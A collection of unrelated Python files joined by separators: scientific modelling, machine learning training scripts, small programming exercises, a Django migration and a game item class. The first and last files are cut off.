hyperaparameters describing a population of events to reweight the priors
on key parameters.
"""
def __init__(self, data, samples_tensor, fit_blending=False):
super(PredictiveModel, self).__init__(data, standardize=False)
# Compute alert time
alert_time = find_alert_time(data)
n_bands = len(data.light_curves)
BoundedNormal = pm.Bound(pm.Normal, lower=0.0)
BoundedNormal_1 = pm.Bound(pm.Normal, lower=1.0)
# mock prior if fit_blending=True
f = pm.Uniform("f", 0.0, 1.0, testval=0.5, shape=(n_bands))
m_b = pm.Normal(
"m_b",
mu=15.0 * T.ones(n_bands),
sd=10.0 * T.ones(n_bands),
testval=22.0
- 2.5
* T.log10(T.as_tensor_variable(ca.utils.estimate_baseline_flux(data))),
shape=(n_bands),
)
F_base = 10 ** (-(m_b - 22.0) / 2.5)
# The following are mock priors, they don't do anything, it's just so
# PyMC3 initializes the RVs
ln_delta_t0 = pm.Uniform("ln_delta_t0", -1, 8, testval=3.0) # mock prior
ln_A0 = pm.Uniform("ln_A0", 0.0, 100, testval=2.0) # mock prior
ln_tE = pm.Uniform("ln_tE", -1, 8, testval=3.0) # mock prior
delta_t0 = T.exp(ln_delta_t0)
u0 = pm.Deterministic(
"u0", T.sqrt(2 * T.exp(ln_A0) / T.sqrt(T.exp(ln_A0) ** 2 - 1) - 2)
)
# Deterministic transformations
tE = pm.Deterministic("tE", T.exp(ln_tE))
# Compute the trajectory of the lens
trajectory = ca.trajectory.Trajectory(data, alert_time + delta_t0, u0, tE)
u = trajectory.compute_trajectory(self.t)
# Compute the magnification
mag = (u ** 2 + 2) / (u * T.sqrt(u ** 2 + 4))
# Compute the mean model
mean = f * F_base * mag + (1 - f) * F_base
# We allow for rescaling of the error bars by a constant factor
c = BoundedNormal_1(
"c",
mu=T.ones(n_bands),
sd=2.0 * T.ones(n_bands),
testval=1.5,
shape=(n_bands),
)
# Diagonal terms of the covariance matrix
var_F = (c * self.sig_F) ** 2
# Compute the Gaussian log_likelihood, add it as a potential term to the model
ll_single = self.compute_log_likelihood(self.F - mean, var_F)
# Compute additional term for the likelihood
lam_ln_A0 = samples_tensor[:, 0]
mu_ln_delta_t0 = samples_tensor[:, 1]
sig_ln_delta_t0 = samples_tensor[:, 2]
mu_ln_tE = samples_tensor[:, 3]
sig_ln_tE = samples_tensor[:, 4]
alpha_f = samples_tensor[:, 5]
beta_f = samples_tensor[:, 6]
# Iterate over samples from hyperparameters
prior_ln_A0 = pm.Exponential.dist(lam_ln_A0).logp(ln_A0)
prior_ln_delta_t0 = pm.Normal.dist(mu=mu_ln_delta_t0, sd=sig_ln_delta_t0).logp(
ln_delta_t0
)
prior_ln_tE = pm.Normal.dist(mu=mu_ln_tE, sd=sig_ln_tE).logp(ln_tE)
if fit_blending == True:
prior_f = pm.Beta.dist(alpha_f, beta_f).logp(f)
ll_hyper = T.log(
T.sum(T.exp(prior_ln_A0 + prior_ln_tE + prior_ln_delta_t0 + prior_f))
)
else:
ll_hyper = T.log(
T.sum(T.exp(prior_ln_A0 + prior_ln_tE + prior_ln_delta_t0))
)
|
#!/usr/bin/env python3
text = input("Enter string: ")
n = text.count(" ")
n = n + 1
print(n)
|
import random
liste = [random.randrange(1,101,1) for _ in range(random.randrange(5,31,1))]
print("entrée : ", liste)
def quicksorting(array):
if (len(array) > 0):
wall = 0
pivot = len(array) - 1
for i in range(len(array)):
if array[i] < array[pivot]:
array[i], array[wall] = array[wall], array[i]
wall += 1
elif i == pivot:
array[wall], array[pivot] = array[pivot], array[wall]
array[:wall] = quicksorting(array[:wall])
array[wall+1:] = quicksorting(array[wall+1:])
return array
print("sortie : ", quicksorting(liste)) |
"""Demonstration of the SimPhoNy Lammps-md Wrapper usingCUDS."""
from __future__ import print_function
import numpy
from simphony import CUBA, CUDS, Simulation
from simphony.cuds.meta import api
from simphony.cuds.particles import Particle, Particles
from simphony.engine import EngineInterface
# ########################################################
# Preprocessing step ######
# Create initial PARTICLES ######
# can be replaced with the crystal tools in common. ######
# ########################################################
# The lattice parameter (in a cubic setup)
a_latt = 1.549
# Use a SC unit cell with basis for the FCC system
unit_cell = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
# The basis of the FCC system in the SC setup:
basis = [
[0.0, 0.0, 0.0],
[0.5, 0.5, 0.0],
[0.5, 0.0, 0.5],
[0.0, 0.5, 0.5]
]
# The number of periodic images, or duplications of the unit cell in
# each cubic lattice direction
N_dup = [4, 4, 4]
# total number of atoms after duplication
natoms = len(basis) * N_dup[0] * N_dup[1] * N_dup[2]
# create a Data set CUDS component named test
pc = Particles("Test")
# pc = api.Particles(name="Test", particle=None, bond=None)
i = 0
pos = [0, 0, 0]
atoms1 = basis
atoms = list()
# loop over the super cell (unit cell) directions
for i in range(0, 3):
# loop over the duplicates (repetitions)
for idup in range(0, N_dup[i]):
# loop over the number of atoms in the basis.
for j in range(0, len(atoms1)):
pos = [0, 0, 0]
for k in range(0, 3):
pos[k] = idup * unit_cell[i][k] + atoms1[j][k]
atoms.append(pos)
atoms1 = atoms
atoms = []
# have seed so the validation can be reproduced
numpy.random.seed(42)
input_particles = []
for pos in atoms1:
pos2 = [pos[0] * a_latt, pos[1] * a_latt, pos[2] * a_latt]
p = Particle(coordinates=pos2)
# p = api.Particle(position=pos2)
# Usually, user asks the MD program to initialize the velocities
# according to a Maxwell-Boltzmann distribution. In this example
# we define a uniform random distribution, the MD algorithm will
# in any case result in a MB one quickly.
p.data[CUBA.VELOCITY] = [
numpy.random.uniform(-0.5, 0.5),
numpy.random.uniform(-0.5, 0.5),
numpy.random.uniform(-0.5, 0.5)
]
pc.add([p])
input_particles.append(p)
# Calculate the velocity of center of mass and reset it to zero to
# avoid drift of the whole system.
v_cm = [0, 0, 0]
for p in pc.iter(item_type=CUBA.PARTICLE):
v_cm[0] += p.data[CUBA.VELOCITY][0]
v_cm[1] += p.data[CUBA.VELOCITY][1]
v_cm[2] += p.data[CUBA.VELOCITY][2]
number_of_points = pc.count_of(CUBA.PARTICLE)
v_cm[0] /= number_of_points
v_cm[1] /= number_of_points
v_cm[2] /= number_of_points
for p in pc.iter(item_type=CUBA.PARTICLE):
p.data[CUBA.VELOCITY][0] -= v_cm[0]
p.data[CUBA.VELOCITY][1] -= v_cm[1]
p.data[CUBA.VELOCITY][2] -= v_cm[2]
######################################
# define a material:
mat = api.Material(name='a_material')
# give it a (shared) material property
mat.data[CUBA.MASS] = 1.0
# mark all particles in pc to belong to mat:
for p in pc.iter(item_type=CUBA.PARTICLE):
p.data[CUBA.MATERIAL] = mat
# define a cuds to hold the computational model:
cuds = CUDS(name='fluid')
cuds.add([mat])
# add pc and mat to it.
cuds.add([pc])
# create a simulation box CUDS component, and add it as a CUDS
# component:
box = api.Box(name='simulation_box')
super_cell = [
tuple(N_dup[i] * x * a_latt for x in v) for i, v in enumerate(unit_cell)]
box.vector = super_cell
cuds.add([box])
# create a molecular dynamics model (NVE with temperature rescaling)
md_nve = api.MolecularDynamics(name='md_test')
# add the physics equation to the CUDS computational model.
cuds.add([md_nve])
# or in one statement: cuds.add(MD(name='mdnve'))
# create a empty thermostat as a general material relation
thermo = api.TemperatureRescaling(material=[mat], name='tempscale')
thermo.description = 'a simple temperature rescaling test'
# scale the temperature from 0 to 1
thermo.temperature = [0.0, 1.0]
# this is in time units, not steps.
thermo.coupling_time = 0.000025
# add the thermostat to the CUDS computational model.
thermo.material = [mat]
cuds.add([thermo])
# create a new solver component:
sp = api.SolverParameter(name='solverParameters')
# create a new solver component:
sp = api.SolverParameter(name='solverParameters')
# integration time:
itime = api.IntegrationTime(name="md_nve_integration_time")
itime.time = 0.0
itime.step = 0.0025
itime.final = 10.25
cuds.add([itime])
verlet = api.Verlet(name="Verlet")
cuds.add([verlet])
# define periodic boundary condition
pbc = api.Periodic(name='pbc')
cuds.add([pbc])
# attache this to the boundaries of the box:
box = cuds.get_by_name('simulation_box')
box.condition = [cuds.get_by_name('pbc'), pbc, pbc]
cuds.update([box])
# define the interatomic force as material relation
lj = api.LennardJones_6_12([mat, mat], name='LennardJones')
lj.cutoff_distance = 2.5
lj.energy_well_depth = 1.0
lj.van_der_waals_radius = 1.0
# lj.material = [cuds.get('mat'), cuds.get('mat')]
cuds.add([lj])
# initialization of the simulation
sim = Simulation(cuds, "LAMMPS", engine_interface=EngineInterface.Internal)
sim.run()
thermo = api.NoseHoover(name='thermo')
thermo.temperature = [1.0, 1.2]
thermo.coupling_time = 0.00000025
thermo.material = [cuds.get(mat.uid)]
cuds.add([thermo])
pc = cuds.get_by_name('Test')
# pc is now a proxy to the pc in the "wrapper" managed by the sim.
particle = pc.get(input_particles[0].uid)
particle.data[CUBA.VELOCITY] = [
numpy.random.uniform(-0.5, 0.5),
numpy.random.uniform(-0.5, 0.5),
numpy.random.uniform(-0.5, 0.5)
]
pc.update([particle])
sim.run()
|
## Onur Yilmaz
## CENG 463 - Term Project
## File for validation list creation
## Import for file operation
import yaml
## List of URLS
validationList=[
('http://www.beyazperde.com/filmler/film-145397/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-214686/elestiriler-beyazperde/', 'NEGATIVE'),
('http://www.beyazperde.com/filmler/film-54343/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-193101/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-190267/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-201797/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-176279/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-145646/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-205375/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-203662/elestiriler-beyazperde/', 'NEGATIVE'),
('http://www.beyazperde.com/filmler/film-198903/elestiriler-beyazperde/', 'NEGATIVE'),
('http://www.beyazperde.com/filmler/film-196306/elestiriler-beyazperde/', 'NEUTRAL'),
('http://www.beyazperde.com/filmler/film-209296/elestiriler-beyazperde/', 'NEGATIVE'),
('http://www.beyazperde.com/filmler/film-194879/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-185999/elestiriler-beyazperde/', 'NEUTRAL'),
('http://www.beyazperde.com/filmler/film-145646/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-190794/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-195834/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-132874/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-192858/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-192067/elestiriler-beyazperde/', 'NEGATIVE'),
('http://www.beyazperde.com/filmler/film-178980/elestiriler-beyazperde/', 'NEUTRAL'),
('http://www.beyazperde.com/filmler/film-146622/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-128188/elestiriler-beyazperde/', 'NEUTRAL'),
('http://www.beyazperde.com/filmler/film-183369/elestiriler-beyazperde/', 'NEUTRAL'),
('http://www.beyazperde.com/filmler/film-203597/elestiriler-beyazperde/', 'NEGATIVE'),
('http://www.beyazperde.com/filmler/film-190799/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-181443/elestiriler-beyazperde/', 'NEGATIVE'),
('http://www.beyazperde.com/filmler/film-185970/elestiriler-beyazperde/', 'NEUTRAL'),
('http://www.beyazperde.com/filmler/film-141564/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-187864/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-140459/elestiriler-beyazperde/', 'NEGATIVE'),
('http://www.beyazperde.com/filmler/film-205984/elestiriler-beyazperde/', 'NEUTRAL'),
('http://www.beyazperde.com/filmler/film-196699/elestiriler-beyazperde/', 'NEGATIVE'),
('http://www.beyazperde.com/filmler/film-201649/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-205968/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-178179/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-182404/elestiriler-beyazperde/', 'NEGATIVE'),
('http://www.beyazperde.com/filmler/film-196676/elestiriler-beyazperde/', 'NEUTRAL'),
('http://www.beyazperde.com/filmler/film-183144/elestiriler-beyazperde/', 'NEUTRAL'),
('http://www.beyazperde.com/filmler/film-146628/elestiriler-beyazperde/', 'NEGATIVE'),
('http://www.beyazperde.com/filmler/film-204106/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-197153/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-186349/elestiriler-beyazperde/', 'NEUTRAL'),
('http://www.beyazperde.com/filmler/film-188159/elestiriler-beyazperde/', 'NEGATIVE'),
('http://www.beyazperde.com/filmler/film-189944/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-144687/elestiriler-beyazperde/', 'NEGATIVE'),
('http://www.beyazperde.com/filmler/film-201209/elestiriler-beyazperde/', 'NEGATIVE'),
('http://www.beyazperde.com/filmler/film-175594/elestiriler-beyazperde/', 'POSITIVE'),
('http://www.beyazperde.com/filmler/film-136181/elestiriler-beyazperde/', 'POSITIVE'),
]
# Saving the list
file_writing = file('validationList.yaml', 'w')
yaml.dump(validationList, file_writing)
file_writing.close()
print "Done!"
## End of code
|
__author__ = 'Kostya'
from sklearn.preprocessing import PolynomialFeatures
from sklearn.linear_model import LinearRegression
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
df = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-databases/housing/housing.data',
header=None, sep='\s+')
df.columns = ['CRIM', 'ZN', 'INDUS', 'CHAS',
'NOX', 'RM', 'AGE', 'DIS', 'RAD',
'TAX', 'PTRATIO', 'B', 'LSTAT', 'MEDV']
X = df[['LSTAT']].values
y = df['MEDV'].values
plt.scatter(X,y)
r = LinearRegression()
quad = PolynomialFeatures(degree=2)
X_q = quad.fit_transform(X)
r.fit(X_q,y)
X_arg = np.arange(X.min(), X.max(),1)[:,np.newaxis]
plt.plot(X_arg,r.predict(quad.fit_transform(X_arg)), color='green', lw=2)
trip = PolynomialFeatures(degree=3)
X_t = trip.fit_transform(X)
r.fit(X_t,y)
plt.plot(X_arg,r.predict(trip.fit_transform(X_arg)), color='red', lw=2)
sns.pairplot(df[['LSTAT','INDUS','NOX','RM','MEDV','TAX','RAD']])
plt.show() |
import cv2 as cv
import numpy as np
width = 640
height = 480
bpp = 3
img = np.zeros((height, width, bpp), np.uint8)
img_h = img.shape[0]
img_w = img.shape[1]
img_bpp = img.shape[2] # 채널수
# 원 그리기
cv.line(img, (width-1, 0), (0, height-1), (0, 255, 0), 3)
cv.line(img, (0, 0), (width-1, height-1), (0, 0, 255), 3)
cv.imshow("result", img)
cv.waitKey(0)
|
import os
folder_path = "/Users/hzguo/11785/group/dataverse_files/staple-2020-train/en_hu"
gold_file = folder_path + "/" +"train.en_hu.2020-01-13.gold.txt"
baseline_file = folder_path + "/" + "train.en_hu.aws_baseline.pred.txt"
output_folder = "/Users/hzguo/11785/group/en_hu"
train_folder = output_folder + "/" + "train" + "/"
test_folder = output_folder + "/" + "test" + "/"
val_folder = output_folder + "/" + "val" + "/"
train_prop = 0.9
try:
os.mkdir(train_folder)
os.mkdir(test_folder)
os.mkdir(val_folder)
except :
pass
prompt_dict = {}
prompt_id = None
max_list_length = 0
with open(gold_file, "r") as f1, open(baseline_file, "r") as f2:
for line in f1:
if len(line) == 1:
if prompt_id is not None:
prompt_dict[prompt_id] = [prompt_text, prompt_accept]
max_list_length = max(max_list_length, len(prompt_accept))
prompt_id = None
continue
if prompt_id is None:
parts = line.split("|")
prompt_id = parts[0]
prompt_text = parts[1][:-1]
prompt_accept = []
else:
parts = line.split("|")
prompt_accept.append((parts[0], float(parts[1])))
if prompt_id is not None:
prompt_dict[prompt_id] = [prompt_text, prompt_accept]
prompt_id = None
for line in f2:
if len(line) == 1:
prompt_id = None
continue
if prompt_id is None:
parts = line.split("|")
prompt_id = parts[0]
prompt_text = parts[1][:-1]
assert(prompt_text == prompt_dict[prompt_id][0])
else:
prompt_dict[prompt_id].append(line)
prompt_id_list = [k for k in prompt_dict.keys()]
train_number = int(len(prompt_id_list)*train_prop)
train_prompt_id_list = prompt_id_list[:train_number]
test_prompt_id_list = prompt_id_list[train_number:]
def write_train_file(folder_name, prompt_id_list):
with open(folder_name + "src.txt", "w") as f1, open(folder_name + "tgt.txt", "w") as f2:
for i in range(int((max_list_length+1)/2)):
for prompt_id in prompt_id_list:
id0 = 2*i
id1 = 2*i+1
if id1-1 < len(prompt_dict[prompt_id][1]):
f1.write(prompt_dict[prompt_id][2] if id0 == 0 else prompt_dict[prompt_id][1][id0-1][0] + "\n")
f2.write(prompt_dict[prompt_id][1][id1-1][0] + "\n")
def write_test_file(folder_name, prompt_id_list):
with open(folder_name + "src.txt", "w") as f1, open(folder_name + "tgt.txt", "w") as f2:
for prompt_id in prompt_id_list:
f1.write("{}|{}".format(prompt_id,prompt_dict[prompt_id][2]))
f2.write("{}|{}\n".format(prompt_id,prompt_dict[prompt_id][0]))
for line in prompt_dict[prompt_id][1]:
f2.write("{}|{}\n".format(line[0], line[1]))
f2.write("\n")
write_train_file(train_folder, train_prompt_id_list)
write_train_file(val_folder, test_prompt_id_list)
write_test_file(test_folder, test_prompt_id_list)
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run SGD training on a cloud TPU. We are not using data augmentation."""
import os
from jax import numpy as jnp
import jax
import tensorflow.compat.v2 as tf
import argparse
import time
from collections import OrderedDict
from bnn_hmc import data
from bnn_hmc import models
from bnn_hmc import nn_loss
from bnn_hmc import train_utils
from bnn_hmc import checkpoint_utils
from bnn_hmc import cmd_args_utils
from bnn_hmc import tabulate_utils
parser = argparse.ArgumentParser(description="Run SGD on a cloud TPU")
cmd_args_utils.add_common_flags(parser)
parser.add_argument("--init_step_size", type=float, default=1.e-6,
help="Initial SGD step size")
parser.add_argument("--num_epochs", type=int, default=300,
help="Total number of SGD epochs iterations")
parser.add_argument("--batch_size", type=int, default=80, help="Batch size")
parser.add_argument("--momentum_decay", type=float, default=0.9,
help="Momentum decay parameter for SGD")
parser.add_argument("--eval_freq", type=int, default=10,
help="Frequency of evaluation (epochs)")
parser.add_argument("--save_freq", type=int, default=50,
help="Frequency of checkpointing (epochs)")
args = parser.parse_args()
train_utils.set_up_jax(args.tpu_ip, args.use_float64)
def train_model():
subdirname = "sgd_wd_{}_stepsize_{}_batchsize_{}_momentum_{}_seed_{}".format(
args.weight_decay, args.init_step_size, args.batch_size, args.momentum_decay,
args.seed)
dirname = os.path.join(args.dir, subdirname)
os.makedirs(dirname, exist_ok=True)
tf_writer = tf.summary.create_file_writer(dirname)
cmd_args_utils.save_cmd(dirname, tf_writer)
dtype = jnp.float64 if args.use_float64 else jnp.float32
train_set, test_set, num_classes = data.make_ds_pmap_fullbatch(
args.dataset_name, dtype)
net_apply, net_init = models.get_model(args.model_name, num_classes)
log_likelihood_fn = nn_loss.make_xent_log_likelihood(num_classes, 1.)
log_prior_fn, _ = (
nn_loss.make_gaussian_log_prior(args.weight_decay, 1.))
num_data = jnp.size(train_set[1])
num_batches = num_data // args.batch_size
num_devices = len(jax.devices())
total_steps = num_batches * args.num_epochs
lr_schedule = train_utils.make_cosine_lr_schedule(
args.init_step_size, total_steps)
optimizer = train_utils.make_optimizer(
lr_schedule, momentum_decay=args.momentum_decay)
checkpoint_dict, status = checkpoint_utils.initialize(
dirname, args.init_checkpoint)
if status == checkpoint_utils.InitStatus.INIT_RANDOM:
key, net_init_key = jax.random.split(jax.random.PRNGKey(args.seed), 2)
print("Starting from random initialization with provided seed")
init_data = jax.tree_map(lambda elem: elem[0][:1], train_set)
params, net_state = net_init(net_init_key, init_data, True)
opt_state = optimizer.init(params)
net_state = jax.pmap(lambda _: net_state)(jnp.arange(num_devices))
key = jax.random.split(key, num_devices)
start_iteration = 0
else:
start_iteration, params, net_state, opt_state, key = (
checkpoint_utils.parse_sgd_checkpoint_dict(checkpoint_dict))
if status == checkpoint_utils.InitStatus.INIT_CKPT:
print("Resuming the run from the provided init_checkpoint")
# TODO: fix -- we should only load the parameters in this case
elif status == checkpoint_utils.InitStatus.LOADED_PREEMPTED:
print("Continuing the run from the last saved checkpoint")
sgd_train_epoch, evaluate = train_utils.make_sgd_train_epoch(
net_apply, log_likelihood_fn, log_prior_fn, optimizer, num_batches)
for iteration in range(start_iteration, args.num_epochs):
start_time = time.time()
params, net_state, opt_state, logprob_avg, key = sgd_train_epoch(
params, net_state, opt_state, train_set, key)
iteration_time = time.time() - start_time
tabulate_dict = OrderedDict()
tabulate_dict["iteration"] = iteration
tabulate_dict["step_size"] = lr_schedule(opt_state[-1].count)
tabulate_dict["train_logprob"] = logprob_avg
tabulate_dict["train_acc"] = None
tabulate_dict["test_logprob"] = None
tabulate_dict["test_acc"] = None
tabulate_dict["time"] = iteration_time
with tf_writer.as_default():
tf.summary.scalar("train/log_prob_running", logprob_avg, step=iteration)
tf.summary.scalar("hypers/step_size", lr_schedule(opt_state[-1].count),
step=iteration)
tf.summary.scalar("debug/iteration_time", iteration_time, step=iteration)
if iteration % args.save_freq == 0 or iteration == args.num_epochs - 1:
checkpoint_name = checkpoint_utils.make_checkpoint_name(iteration)
checkpoint_path = os.path.join(dirname, checkpoint_name)
checkpoint_dict = checkpoint_utils.make_sgd_checkpoint_dict(
iteration, params, net_state, opt_state, key)
checkpoint_utils.save_checkpoint(checkpoint_path, checkpoint_dict)
if (iteration % args.eval_freq == 0) or (iteration == args.num_epochs - 1):
test_log_prob, test_acc, test_ce, _ = evaluate(params, net_state,
test_set)
train_log_prob, train_acc, train_ce, prior = (
evaluate(params, net_state, train_set))
tabulate_dict["train_logprob"] = train_log_prob
tabulate_dict["test_logprob"] = test_log_prob
tabulate_dict["train_acc"] = train_acc
tabulate_dict["test_acc"] = test_acc
with tf_writer.as_default():
tf.summary.scalar("train/log_prob", train_log_prob, step=iteration)
tf.summary.scalar("test/log_prob", test_log_prob, step=iteration)
tf.summary.scalar("train/log_likelihood", train_ce, step=iteration)
tf.summary.scalar("test/log_likelihood", test_ce, step=iteration)
tf.summary.scalar("train/accuracy", train_acc, step=iteration)
tf.summary.scalar("test/accuracy", test_acc, step=iteration)
table = tabulate_utils.make_table(
tabulate_dict, iteration - start_iteration, args.tabulate_freq)
print(table)
if __name__ == "__main__":
print("JAX sees the following devices:", jax.devices())
train_model()
|
import random
from model.models import Contact
from model.models import Group
def test_del_contact_in_group(app, db):
if len(db.get_contact_list()) == 0:
app.contact.create(Contact(firstname="Vlad", lastname="hater"))
if len(db.get_group_list()) == 0:
app.group.create(Group(name="test"))
groups = db.get_groups_with_contacts()
group = random.choice(groups)
group_id = group.id
contacts = db.get_contacts_in_group()
contact = random.choice(contacts)
contact_id = contact.id
if len(db.get_contacts_in_group()) == 0:
app.contact.add_contact_to_group(contact_id, group_id)
old_contacts = db.get_contacts_in_group()
app.contact.del_contact_in_group(contact_id, group_id)
new_contacts = db.get_contacts_in_group()
assert len(old_contacts) - 1 == len(new_contacts)
|
'''
This code is intended to serve as a basic example for a pendulum disturbed by a trolley
'''
# import all appropriate modules
import numpy as np
from scipy.integrate import odeint
import InputShaping as shaping
import nonzero_shaper as nz_shape
# Define Constants
G = 9.81
DEG_TO_RAD = np.pi / 180
# ODE Solver characteristics
abserr = 1.0e-9
relerr = 1.0e-9
max_step = 0.01
def response(X0, t, p, Distance):
'''
Generate the response of a pendulum disturbed by a trolley
'''
# Unpack the constraints and initial conditions
C, l, StartTime, x_init,x_fin, t_step, Shaper = p
# Determine the natural frequency
omega_n = np.sqrt(G/ l) # rad/s
# The InputShaping module does a Hertz to Radians conversion.
omega_n /= (2 * np.pi) # Hz
# Assume the system is undamped
zeta = 0.
#Determine the step at which the command is initiated
Start_step = (StartTime / t_step).astype(int)
# Initialize
unshaped_input = np.zeros_like(t)
print('Distance: {}'.format(Distance))
# Matrix of residual amplitudes per unique distance and StartTime
Amp = np.zeros([len(Distance),len(StartTime)])
#Iterate through the distance and starttime vectors
for i in np.arange(0,len(Distance)):
for j in np.arange(0,len(StartTime)):
response = np.zeros([len(t),len(X0)])
# Create an unshaped input
unshaped_input[Start_step[j]:-1] = shaping.bang_bang(
t[Start_step[j]:-1], C[0], C[1], Distance[i], StartTime[j]
)
sys_in = np.zeros_like(unshaped_input)
# Generate a shaped command
if Shaper == 'UMZV Shaped':
in_shape = shaping.UMZV(omega_n, zeta).shaper
sys_in[Start_step[j]:-1] = shaping.shaped_input(
shaping.bang_bang, t[Start_step[j]:-1],in_shape,
C[0],C[1],Distance[i], StartTime[j]
)
if Shaper == 'ZV Initial Conditions':
ZV_shape = shaping.ZV(omega_n, zeta).shaper
in_shape = nz_shape.test_shaper(omega_n,zeta,[X0[0],X0[1]],C[0])
sys_in[701:len(t)] = shaping.shaped_input(
shaping.bang_bang, t[701:len(t)],ZV_shape,
C[0],C[1],Distance[i], StartTime[j]
)
sys_in[0:700] = shaping.shaped_input(
shaping.bang_bang, t[0:700],in_shape,
C[0],C[1],Distance[i], StartTime[j]
)
elif Shaper == 'ZV Shaped':
in_shape = shaping.ZV(omega_n, zeta).shaper
sys_in[Start_step[j]:-1] = shaping.shaped_input(
shaping.bang_bang, t[Start_step[j]:-1],in_shape,
C[0],C[1],Distance[i], StartTime[j]
)
elif Shaper == 'EI Shaped':
in_shape = shaping.EI(omega_n, zeta).shaper
sys_in[Start_step[j]:-1] = shaping.shaped_input(
shaping.bang_bang, t[Start_step[j]:-1],in_shape,
C[0],C[1],Distance[i], StartTime[j]
)
else:
sys_in = unshaped_input
# Generate the response
response = odeint(
eq_motion, X0, t, args=(sys_in,t,l),
atol=abserr, rtol=relerr, hmax=t_step
)
# Calculate the residual amplitude
Amp[i,j] = (np.amax(response[:,0]) - np.amin(response[:,0])) / 2
return response, Amp
def eq_motion(X,t,sys_in,t_sys,length):
'''
Returns the state-space equations of motion for the system.
Inputs:
X - State variables
t - Current system time
sys_in - Acceleration input commanded to the system
t_sys - total time array for the system. Used to interpolate the current time
length - length of the pendulum
'''
# Grab the state Variables
theta,theta_dot, x, x_dot = X
# If the sys_in vector is not empty, generate an acceleration input
if len(sys_in) != 0 and sys_in.any != -1:
# Interpolate the system input
xddot = np.interp(t,t_sys,sys_in)
# Evaluate the differential equations of motion
ODE = [ theta_dot,
- 1 / length * xddot - G / length * theta,
x_dot,
xddot]
return ODE
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-11-29 21:22
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('LariatApp', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='patient',
name='appetite',
),
migrations.RemoveField(
model_name='patient',
name='cancer',
),
migrations.RemoveField(
model_name='patient',
name='chf',
),
migrations.RemoveField(
model_name='patient',
name='created_by',
),
migrations.RemoveField(
model_name='patient',
name='eating',
),
migrations.RemoveField(
model_name='patient',
name='hygiene',
),
migrations.RemoveField(
model_name='patient',
name='memory',
),
migrations.RemoveField(
model_name='patient',
name='mobility',
),
migrations.RemoveField(
model_name='patient',
name='nephrologist',
),
migrations.RemoveField(
model_name='patient',
name='snf',
),
migrations.RemoveField(
model_name='patient',
name='sob',
),
migrations.RemoveField(
model_name='patient',
name='toileting',
),
migrations.RemoveField(
model_name='patient',
name='weight_loss',
),
]
|
from game.items.item import Log
from game.skills import SkillTypes
class MapleLog(Log):
name = 'Maple Log'
value = 97
xp = {SkillTypes.firemaking: 135.5, SkillTypes.fletching: 1}
skill_requirement = {SkillTypes.firemaking: 45, SkillTypes.fletching: 1} |
from edualgo import print_msg_box
class combinationsDict(dict):
def __missing__(self, k):
n,r = k
if r==0 or r==n:
self[k] = 1
return 1
K = self[n-1,r-1] + self[n-1,r]
self[k]= K
return K
@property
def hint(self):
message = """
------formal definition------
number of combinations is defined as:
The number of selections of a given number of elements from a larger number without regard to their arrangement.
for r elements to be selected from n elements, number of combinations is denoted by nCr
nCr = (n!)/((r!)*(n-r)!)
------recursive definition------
C(n, r) = C(n-1, r-1) + C(n-1, r)
base case: C(n, 0) = C(n, n) = 1
------usage------
obj = combinationsDict()
print("3C2 =",obj[3,2])
"""
print_msg_box(message)
|
#!/usr/bin/python3
def multiple_returns(sentence):
if not(len(sentence) == 0):
return len(sentence), sentence[0]
return (0, None)
|
### this contains a test python file
print("Hellow world")
|
# coding: utf-8
# In[1]:
import sys
sys.path.append("../")
# In[2]:
import numpy as np, pandas as pd
import gym
from gym_ianna.envs.ianna_env import IANNAEnv
import tensorflow as tf
# In[3]:
import gym_ianna.envs.ianna_env as ianna_env
ianna_env.__file__
# In[4]:
default_args = {
'ENV': 'IANNA-v0'
,'START_STATE_FROM': 0 # last 15 bits of the IANNA state are the groupby bits
,'OP_NUMBER' : 15 # how many fields can we turn on
,'STATE_INPUT_SIZE' : 51 # how many fields can we observe
